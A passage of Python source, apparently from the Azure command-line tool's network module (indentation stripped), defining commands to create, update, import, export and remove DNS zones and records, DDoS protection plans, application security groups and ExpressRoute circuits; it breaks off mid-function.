def create_asg(cmd, client, resource_group_name, application_security_group_name, location=None, tags=None):
ApplicationSecurityGroup = cmd.get_models('ApplicationSecurityGroup')
asg = ApplicationSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, application_security_group_name, asg)
def update_asg(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region DdosProtectionPlans
def create_ddos_plan(cmd, resource_group_name, ddos_plan_name, location=None, tags=None, vnets=None):
from azure.cli.core.commands import LongRunningOperation
ddos_client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
ddos_protection_plan = cmd.get_models('DdosProtectionPlan')()
if location:
ddos_protection_plan.location = location
if tags:
ddos_protection_plan.tags = tags
if not vnets:
# if no VNETs can do a simple PUT
return ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)
# if VNETs specified, have to create the protection plan and then add the VNETs
plan_id = LongRunningOperation(cmd.cli_ctx)(
ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)).id
SubResource = cmd.get_models('SubResource')
logger.info('Attempting to attach VNets to newly created DDoS protection plan.')
for vnet_subresource in vnets:
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
id_parts = parse_resource_id(vnet_subresource.id)
vnet = vnet_client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=plan_id)
vnet_client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return ddos_client.get(resource_group_name, ddos_plan_name)
def update_ddos_plan(cmd, instance, tags=None, vnets=None):
SubResource = cmd.get_models('SubResource')
if tags is not None:
instance.tags = tags
if vnets is not None:
logger.info('Attempting to update the VNets attached to the DDoS protection plan.')
vnet_ids = set([])
if len(vnets) == 1 and not vnets[0]:
pass
else:
vnet_ids = {x.id for x in vnets}
existing_vnet_ids = {x.id for x in instance.virtual_networks} if instance.virtual_networks else set([])
client = network_client_factory(cmd.cli_ctx).virtual_networks
for vnet_id in vnet_ids.difference(existing_vnet_ids):
logger.info("Adding VNet '%s' to plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=instance.id)
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
for vnet_id in existing_vnet_ids.difference(vnet_ids):
logger.info("Removing VNet '%s' from plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = None
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return instance
def list_ddos_plans(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
# endregion
# region DNS Commands
# add delegation name server record for the created child zone in it's parent zone.
def add_dns_delegation(cmd, child_zone, parent_zone, child_rg, child_zone_name):
"""
:param child_zone: the zone object corresponding to the child that is created.
:param parent_zone: the parent zone name / FQDN of the parent zone.
if parent zone name is mentioned, assume current subscription and resource group.
:param child_rg: resource group of the child zone
:param child_zone_name: name of the child zone
"""
import sys
from azure.core.exceptions import HttpResponseError
parent_rg = child_rg
parent_subscription_id = None
parent_zone_name = parent_zone
if is_valid_resource_id(parent_zone):
id_parts = parse_resource_id(parent_zone)
parent_rg = id_parts['resource_group']
parent_subscription_id = id_parts['subscription']
parent_zone_name = id_parts['name']
if all([parent_zone_name, parent_rg, child_zone_name, child_zone]) and child_zone_name.endswith(parent_zone_name):
record_set_name = child_zone_name.replace('.' + parent_zone_name, '')
try:
for dname in child_zone.name_servers:
add_dns_ns_record(cmd, parent_rg, parent_zone_name, record_set_name, dname, parent_subscription_id)
print('Delegation added succesfully in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print('Could not add delegation in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
def create_dns_zone(cmd, client, resource_group_name, zone_name, parent_zone_name=None, tags=None,
if_none_match=False, zone_type='Public', resolution_vnets=None, registration_vnets=None):
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
zone = Zone(location='global', tags=tags)
if hasattr(zone, 'zone_type'):
zone.zone_type = zone_type
zone.registration_virtual_networks = registration_vnets
zone.resolution_virtual_networks = resolution_vnets
created_zone = client.create_or_update(resource_group_name, zone_name, zone,
if_none_match='*' if if_none_match else None)
if cmd.supported_api_version(min_api='2016-04-01') and parent_zone_name is not None:
logger.info('Attempting to add delegation in the parent zone')
add_dns_delegation(cmd, created_zone, parent_zone_name, resource_group_name, zone_name)
return created_zone
def update_dns_zone(instance, tags=None, zone_type=None, resolution_vnets=None, registration_vnets=None):
if tags is not None:
instance.tags = tags
if zone_type:
instance.zone_type = zone_type
if resolution_vnets == ['']:
instance.resolution_virtual_networks = None
elif resolution_vnets:
instance.resolution_virtual_networks = resolution_vnets
if registration_vnets == ['']:
instance.registration_virtual_networks = None
elif registration_vnets:
instance.registration_virtual_networks = registration_vnets
return instance
def list_dns_zones(cmd, resource_group_name=None):
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).zones
if resource_group_name:
return ncf.list_by_resource_group(resource_group_name)
return ncf.list()
def create_dns_record_set(cmd, resource_group_name, zone_name, record_set_name, record_set_type,
metadata=None, if_match=None, if_none_match=None, ttl=3600, target_resource=None):
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
SubResource = cmd.get_models('SubResource', resource_type=ResourceType.MGMT_NETWORK)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = RecordSet(
ttl=ttl,
metadata=metadata,
target_resource=SubResource(id=target_resource) if target_resource else None
)
return client.create_or_update(resource_group_name, zone_name, record_set_name,
record_set_type, record_set, if_match=if_match,
if_none_match='*' if if_none_match else None)
def list_dns_record_set(client, resource_group_name, zone_name, record_type=None):
if record_type:
return client.list_by_type(resource_group_name, zone_name, record_type)
return client.list_by_dns_zone(resource_group_name, zone_name)
def update_dns_record_set(instance, cmd, metadata=None, target_resource=None):
if metadata is not None:
instance.metadata = metadata
if target_resource == '':
instance.target_resource = None
elif target_resource is not None:
SubResource = cmd.get_models('SubResource')
instance.target_resource = SubResource(id=target_resource)
return instance
def _type_to_property_name(key):
type_dict = {
'a': 'a_records',
'aaaa': 'aaaa_records',
'caa': 'caa_records',
'cname': 'cname_record',
'mx': 'mx_records',
'ns': 'ns_records',
'ptr': 'ptr_records',
'soa': 'soa_record',
'spf': 'txt_records',
'srv': 'srv_records',
'txt': 'txt_records',
}
return type_dict[key.lower()]
def export_zone(cmd, resource_group_name, zone_name, file_name=None):
from time import localtime, strftime
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
record_sets = client.record_sets.list_by_dns_zone(resource_group_name, zone_name)
zone_obj = OrderedDict({
'$origin': zone_name.rstrip('.') + '.',
'resource-group': resource_group_name,
'zone-name': zone_name.rstrip('.'),
'datetime': strftime('%a, %d %b %Y %X %z', localtime())
})
for record_set in record_sets:
record_type = record_set.type.rsplit('/', 1)[1].lower()
record_set_name = record_set.name
record_data = getattr(record_set, _type_to_property_name(record_type), None)
# ignore empty record sets
if not record_data:
continue
if not isinstance(record_data, list):
record_data = [record_data]
if record_set_name not in zone_obj:
zone_obj[record_set_name] = OrderedDict()
for record in record_data:
record_obj = {'ttl': record_set.ttl}
if record_type not in zone_obj[record_set_name]:
zone_obj[record_set_name][record_type] = []
if record_type == 'aaaa':
record_obj.update({'ip': record.ipv6_address})
elif record_type == 'a':
record_obj.update({'ip': record.ipv4_address})
elif record_type == 'caa':
record_obj.update({'val': record.value, 'tag': record.tag, 'flags': record.flags})
elif record_type == 'cname':
record_obj.update({'alias': record.cname.rstrip('.') + '.'})
elif record_type == 'mx':
record_obj.update({'preference': record.preference, 'host': record.exchange.rstrip('.') + '.'})
elif record_type == 'ns':
record_obj.update({'host': record.nsdname.rstrip('.') + '.'})
elif record_type == 'ptr':
record_obj.update({'host': record.ptrdname.rstrip('.') + '.'})
elif record_type == 'soa':
record_obj.update({
'mname': record.host.rstrip('.') + '.',
'rname': record.email.rstrip('.') + '.',
'serial': int(record.serial_number), 'refresh': record.refresh_time,
'retry': record.retry_time, 'expire': record.expire_time,
'minimum': record.minimum_ttl
})
zone_obj['$ttl'] = record.minimum_ttl
elif record_type == 'srv':
record_obj.update({'priority': record.priority, 'weight': record.weight,
'port': record.port, 'target': record.target.rstrip('.') + '.'})
elif record_type == 'txt':
record_obj.update({'txt': ''.join(record.value)})
zone_obj[record_set_name][record_type].append(record_obj)
zone_file_content = make_zone_file(zone_obj)
print(zone_file_content)
if file_name:
try:
with open(file_name, 'w') as f:
f.write(zone_file_content)
except IOError:
raise CLIError('Unable to export to file: {}'.format(file_name))
# pylint: disable=too-many-return-statements, inconsistent-return-statements
def _build_record(cmd, data):
AaaaRecord, ARecord, CaaRecord, CnameRecord, MxRecord, NsRecord, PtrRecord, SoaRecord, SrvRecord, TxtRecord = \
cmd.get_models('AaaaRecord', 'ARecord', 'CaaRecord', 'CnameRecord', 'MxRecord', 'NsRecord',
'PtrRecord', 'SoaRecord', 'SrvRecord', 'TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_type = data['delim'].lower()
try:
if record_type == 'aaaa':
return AaaaRecord(ipv6_address=data['ip'])
if record_type == 'a':
return ARecord(ipv4_address=data['ip'])
if (record_type == 'caa' and
supported_api_version(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS, min_api='2018-03-01-preview')):
return CaaRecord(value=data['val'], flags=int(data['flags']), tag=data['tag'])
if record_type == 'cname':
return CnameRecord(cname=data['alias'])
if record_type == 'mx':
return MxRecord(preference=data['preference'], exchange=data['host'])
if record_type == 'ns':
return NsRecord(nsdname=data['host'])
if record_type == 'ptr':
return PtrRecord(ptrdname=data['host'])
if record_type == 'soa':
return SoaRecord(host=data['host'], email=data['email'], serial_number=data['serial'],
refresh_time=data['refresh'], retry_time=data['retry'], expire_time=data['expire'],
minimum_ttl=data['minimum'])
if record_type == 'srv':
return SrvRecord(
priority=int(data['priority']), weight=int(data['weight']), port=int(data['port']),
target=data['target'])
if record_type in ['txt', 'spf']:
text_data = data['txt']
return TxtRecord(value=text_data) if isinstance(text_data, list) else TxtRecord(value=[text_data])
except KeyError as ke:
raise CLIError("The {} record '{}' is missing a property. {}"
.format(record_type, data['name'], ke))
# pylint: disable=too-many-statements
def import_zone(cmd, resource_group_name, zone_name, file_name):
from azure.cli.core.util import read_file_content
from azure.core.exceptions import HttpResponseError
import sys
logger.warning("In the future, zone name will be case insensitive.")
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
from azure.cli.core.azclierror import FileOperationError, UnclassifiedUserFault
try:
file_text = read_file_content(file_name)
except FileNotFoundError:
raise FileOperationError("No such file: " + str(file_name))
except IsADirectoryError:
raise FileOperationError("Is a directory: " + str(file_name))
except PermissionError:
raise FileOperationError("Permission denied: " + str(file_name))
except OSError as e:
raise UnclassifiedUserFault(e)
zone_obj = parse_zone_file(file_text, zone_name)
origin = zone_name
record_sets = {}
for record_set_name in zone_obj:
for record_set_type in zone_obj[record_set_name]:
record_set_obj = zone_obj[record_set_name][record_set_type]
if record_set_type == 'soa':
origin = record_set_name.rstrip('.')
if not isinstance(record_set_obj, list):
record_set_obj = [record_set_obj]
for entry in record_set_obj:
record_set_ttl = entry['ttl']
record_set_key = '{}{}'.format(record_set_name.lower(), record_set_type)
record = _build_record(cmd, entry)
if not record:
logger.warning('Cannot import %s. RecordType is not found. Skipping...', entry['delim'].lower())
continue
record_set = record_sets.get(record_set_key, None)
if not record_set:
# Workaround for issue #2824
relative_record_set_name = record_set_name.rstrip('.')
if not relative_record_set_name.endswith(origin):
logger.warning(
'Cannot import %s. Only records relative to origin may be '
'imported at this time. Skipping...', relative_record_set_name)
continue
record_set = RecordSet(ttl=record_set_ttl)
record_sets[record_set_key] = record_set
_add_record(record_set, record, record_set_type,
is_list=record_set_type.lower() not in ['soa', 'cname'])
total_records = 0
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = rs_name[:-(len(origin) + 1)] if rs_name != origin else '@'
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
total_records += record_count
cum_records = 0
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
print('== BEGINNING ZONE IMPORT: {} ==\n'.format(zone_name), file=sys.stderr)
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
client.zones.create_or_update(resource_group_name, zone_name, Zone(location='global'))
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = '@' if rs_name == origin else rs_name
if rs_name.endswith(origin):
rs_name = rs_name[:-(len(origin) + 1)]
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
if rs_name == '@' and rs_type == 'soa':
root_soa = client.record_sets.get(resource_group_name, zone_name, '@', 'SOA')
rs.soa_record.host = root_soa.soa_record.host
rs_name = '@'
elif rs_name == '@' and rs_type == 'ns':
root_ns = client.record_sets.get(resource_group_name, zone_name, '@', 'NS')
root_ns.ttl = rs.ttl
rs = root_ns
rs_type = rs.type.rsplit('/', 1)[1]
try:
client.record_sets.create_or_update(
resource_group_name, zone_name, rs_name, rs_type, rs)
cum_records += record_count
print("({}/{}) Imported {} records of type '{}' and name '{}'"
.format(cum_records, total_records, record_count, rs_type, rs_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print("\n== {}/{} RECORDS IMPORTED SUCCESSFULLY: '{}' =="
.format(cum_records, total_records, zone_name), file=sys.stderr)
def add_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
ttl=3600, if_none_match=None):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
ttl=3600, if_none_match=None):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name, 'arecords',
ttl=ttl, if_none_match=if_none_match)
def add_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value, flags, tag,
ttl=3600, if_none_match=None):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname, ttl=3600, if_none_match=None):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, ttl=ttl, if_none_match=if_none_match)
def add_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
ttl=3600, if_none_match=None):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
subscription_id=None, ttl=3600, if_none_match=None):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
subscription_id=subscription_id, ttl=ttl, if_none_match=if_none_match)
def add_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname, ttl=3600, if_none_match=None):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def update_dns_soa_record(cmd, resource_group_name, zone_name, host=None, email=None,
serial_number=None, refresh_time=None, retry_time=None, expire_time=None,
minimum_ttl=3600, if_none_match=None):
record_set_name = '@'
record_type = 'soa'
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record = record_set.soa_record
record.host = host or record.host
record.email = email or record.email
record.serial_number = serial_number or record.serial_number
record.refresh_time = refresh_time or record.refresh_time
record.retry_time = retry_time or record.retry_time
record.expire_time = expire_time or record.expire_time
record.minimum_ttl = minimum_ttl or record.minimum_ttl
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, if_none_match=if_none_match)
def add_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, if_none_match=None):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
def add_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value, if_none_match=None):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
long_text = ''.join(x for x in record.value)
original_len = len(long_text)
record.value = []
while len(long_text) > 255:
record.value.append(long_text[:255])
long_text = long_text[255:]
record.value.append(long_text)
final_str = ''.join(record.value)
final_len = len(final_str)
assert original_len == final_len
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
def remove_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
keep_empty_record_set=False):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
keep_empty_record_set=False):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value,
flags, tag, keep_empty_record_set=False):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname,
keep_empty_record_set=False):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, keep_empty_record_set=keep_empty_record_set)
def remove_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
keep_empty_record_set=False):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, keep_empty_record_set=False):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value,
keep_empty_record_set=False):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def _check_a_record_exist(record, exist_list):
for r in exist_list:
if r.ipv4_address == record.ipv4_address:
return True
return False
def _check_aaaa_record_exist(record, exist_list):
for r in exist_list:
if r.ipv6_address == record.ipv6_address:
return True
return False
def _check_caa_record_exist(record, exist_list):
for r in exist_list:
if (r.flags == record.flags and
r.tag == record.tag and
r.value == record.value):
return True
return False
def _check_cname_record_exist(record, exist_list):
for r in exist_list:
if r.cname == record.cname:
return True
return False
def _check_mx_record_exist(record, exist_list):
for r in exist_list:
if (r.preference == record.preference and
r.exchange == record.exchange):
return True
return False
def _check_ns_record_exist(record, exist_list):
for r in exist_list:
if r.nsdname == record.nsdname:
return True
return False
def _check_ptr_record_exist(record, exist_list):
for r in exist_list:
if r.ptrdname == record.ptrdname:
return True
return False
def _check_srv_record_exist(record, exist_list):
for r in exist_list:
if (r.priority == record.priority and
r.weight == record.weight and
r.port == record.port and
r.target == record.target):
return True
return False
def _check_txt_record_exist(record, exist_list):
for r in exist_list:
if r.value == record.value:
return True
return False
def _record_exist_func(record_type):
return globals()["_check_{}_record_exist".format(record_type)]
def _add_record(record_set, record, record_type, is_list=False):
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is None:
setattr(record_set, record_property, [])
record_list = getattr(record_set, record_property)
_record_exist = _record_exist_func(record_type)
if not _record_exist(record, record_list):
record_list.append(record)
else:
setattr(record_set, record_property, record)
def _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=True, subscription_id=None, ttl=None, if_none_match=None):
from azure.core.exceptions import HttpResponseError
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS,
subscription_id=subscription_id).record_sets
try:
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
except HttpResponseError:
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_set = RecordSet(ttl=3600)
if ttl is not None:
record_set.ttl = ttl
_add_record(record_set, record, record_type, is_list)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name,
record_type, record_set,
if_none_match='*' if if_none_match else None)
def _remove_record(cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set, is_list=True):
ncf = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is not None:
keep_list = [r for r in record_list
if not dict_matches_filter(r.__dict__, record.__dict__)]
if len(keep_list) == len(record_list):
raise CLIError('Record {} not found.'.format(str(record)))
setattr(record_set, record_property, keep_list)
else:
setattr(record_set, record_property, None)
if is_list:
records_remaining = len(getattr(record_set, record_property))
else:
records_remaining = 1 if getattr(record_set, record_property) is not None else 0
if not records_remaining and not keep_empty_record_set:
logger.info('Removing empty %s record set: %s', record_type, record_set_name)
return ncf.delete(resource_group_name, zone_name, record_set_name, record_type)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name, record_type, record_set)
def dict_matches_filter(d, filter_dict):
sentinel = object()
return all(not filter_dict.get(key, None) or
str(filter_dict[key]) == str(d.get(key, sentinel)) or
lists_match(filter_dict[key], d.get(key, []))
for key in filter_dict)
def lists_match(l1, l2):
try:
return Counter(l1) == Counter(l2) # pylint: disable=too-many-function-args
except TypeError:
return False
# endregion
# region ExpressRoutes
def create_express_route(cmd, circuit_name, resource_group_name, bandwidth_in_mbps, peering_location,
service_provider_name, location=None, tags=None, no_wait=False,
sku_family=None, sku_tier=None, allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
ExpressRouteCircuit, ExpressRouteCircuitSku, ExpressRouteCircuitServiceProviderProperties, SubResource = \
cmd.get_models(
'ExpressRouteCircuit', 'ExpressRouteCircuitSku', 'ExpressRouteCircuitServiceProviderProperties',
'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_circuits
sku_name = '{}_{}'.format(sku_tier, sku_family)
circuit = ExpressRouteCircuit(
location=location, tags=tags,
service_provider_properties=ExpressRouteCircuitServiceProviderProperties(
service_provider_name=service_provider_name,
peering_location=peering_location,
bandwidth_in_mbps=bandwidth_in_mbps if not express_route_port else None),
sku=ExpressRouteCircuitSku(name=sku_name, tier=sku_tier, family=sku_family),
allow_global_reach=allow_global_reach,
bandwidth_in_gbps=(int(bandwidth_in_mbps) / 1000) if express_route_port else None
)
if cmd.supported_api_version(min_api='2010-07-01') and allow_classic_operations is not None:
circuit.allow_classic_operations = allow_classic_operations
if cmd.supported_api_version(min_api='2018-08-01') and express_route_port:
circuit.express_route_port = SubResource(id=express_route_port)
circuit.service_provider_properties = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, circuit_name, circuit)
def update_express_route(instance, cmd, bandwidth_in_mbps=None, peering_location=None,
service_provider_name=None, sku_family=None, sku_tier=None, tags=None,
allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
with cmd.update_context(instance) as c:
c.set_param('allow_classic_operations', allow_classic_operations)
c.set_param('tags', tags)
c.set_param('allow_global_reach', allow_global_reach)
with cmd.update_context(instance.sku) as c:
c.set_param('family', sku_family)
c.set_param('tier', sku_tier)
with cmd.update_context(instance.service_provider_properties) as c:
c.set_param('peering_location', peering_location)
c.set_param('service_provider_name', service_provider_name)
if express_route_port is not None:
SubResource = cmd.get_models('SubResource')
instance.express_route_port = SubResource(id=express_route_port)
instance.service_provider_properties = None
if bandwidth_in_mbps is not None:
if not instance.express_route_port:
instance.service_provider_properties.bandwith_in_mbps = float(bandwidth_in_mbps)
else:
instance.bandwidth_in_gbps = (float(bandwidth_in_mbps) / 1000)
return instance
def create_express_route_peering_connection(cmd, resource_group_name, circuit_name, peering_name, connection_name,
peer_circuit, address_prefix, authorization_key=None):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
ExpressRouteCircuitConnection, SubResource = cmd.get_models('ExpressRouteCircuitConnection', 'SubResource')
source_circuit = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='expressRouteCircuits',
name=circuit_name,
child_type_1='peerings',
child_name_1=peering_name
)
conn = ExpressRouteCircuitConnection(
express_route_circuit_peering=SubResource(id=source_circuit),
peer_express_route_circuit_peering=SubResource(id=peer_circuit),
address_prefix=address_prefix,
authorization_key=authorization_key
)
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def set_express_route_peering_connection_config(cmd, resource_group_name, circuit_name, peering_name, connection_name,
address_prefix):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
# Get Conn
try:
conn = client.get(resource_group_name, circuit_name, peering_name, connection_name)
except ResourceNotFoundError:
raise ResourceNotFoundError("Peering Connection {} doesn't exist".format(connection_name))
Ipv6CircuitConnectionConfig = cmd.get_models('Ipv6CircuitConnectionConfig')
ipv6_config = Ipv6CircuitConnectionConfig(
address_prefix=address_prefix
)
conn.ipv6_circuit_connection_config = ipv6_config
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def remove_express_route_peering_connection_config(cmd, resource_group_name, circuit_name, peering_name,
connection_name):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
# Get Conn
try:
conn = client.get(resource_group_name, circuit_name, peering_name, connection_name)
except ResourceNotFoundError:
raise ResourceNotFoundError("Peering Connection {} doesn't exist".format(connection_name))
conn.ipv6_circuit_connection_config = None
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def _validate_ipv6_address_prefixes(prefixes):
from ipaddress import ip_network, IPv6Network
prefixes = prefixes if isinstance(prefixes, list) else [prefixes]
version = None
for prefix in prefixes:
try:
network = ip_network(prefix)
if version is None:
version = type(network)
else:
